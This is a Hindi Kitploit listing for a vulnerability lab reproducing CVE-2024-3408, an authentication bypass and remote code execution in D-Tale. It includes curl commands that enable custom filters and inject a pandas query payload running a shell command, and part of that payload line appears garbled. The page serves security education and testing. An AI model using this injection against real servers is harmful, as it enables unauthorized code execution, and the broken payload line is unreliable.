Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-3408-dtale — CVE-2024-3408 के लिए भेद्यता प्रयोगशाला - D-Tale Authentication Bypass और RCE | Kitploit
उपकरण/GitHubGitHub/flame-11/cve-2024-3408-dtale
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubflame-11/cve-2024-3408-dtale

CVE-2024-3408-dtale

CVE-2024-3408 के लिए भेद्यता प्रयोगशाला - D-Tale Authentication Bypass और RCE

रिपॉजिटरी देखें
28 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-3408 - D-Tale प्रमाणीकरण बाईपास और RCE

CVE-2024-3408 के लिए पुनरुत्पादित प्रयोगशाला वातावरण, जो D-Tale में प्रमाणीकरण बाईपास और रिमोट कोड निष्पादन कमजोरी है।

कमजोरी

D-Tale संस्करण 3.15.1 तक निम्नलिखित कारणों से कमजोर हैं:

  1. हार्डकोडेड SECRET_KEY ("Dtale") Flask सत्र हस्ताक्षर के लिए - सत्र कुकी जालसाजी की अनुमति देता है
  2. कस्टम फ़िल्टर के माध्यम से कोड निष्पादन - test-filter एंडपॉइंट pandas query का उपयोग करता है जिसका दुरुपयोग मनमाना Python कोड निष्पादित करने के लिए किया जा सकता है

CVSS: 9.8 (गंभीर)
प्रभावित: D-Tale <= 3.15.1

त्वरित आरंभ

root@kitploit:~
docker compose up -d --build

D-Tale http://localhost:40000 पर उपलब्ध होगा

मान्य करें

root@kitploit:~
# Step 1: Enable custom filters
curl -s "http://localhost:40000/dtale/update-settings/1?settings=%7B%22enable_custom_filters%22%3Atrue%7D"
# Expected: {"success":true}

# Step 2: Execute command via pandas query injection
curl -s -G "http://localhost:40000/dtale/test-filter/1" \
  --data-urlencode "[email protected].__import__('os').popen('id').read()"
# Expected: Response contains "uid=" and "gid=" (command output in error message)

सफाई

root@kitploit:~
docker compose down

संदर्भ

  • Huntr रिपोर्ट (CVE-2024-3408)
  • Huntr रिपोर्ट (CVE-2025-0655)
  • NVD
  • D-Tale GitHub

अस्वीकरण

यह प्रयोगशाला केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। इसका उपयोग उन प्रणालियों के विरुद्ध न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की अनुमति नहीं है।

टूल डाउनलोड करें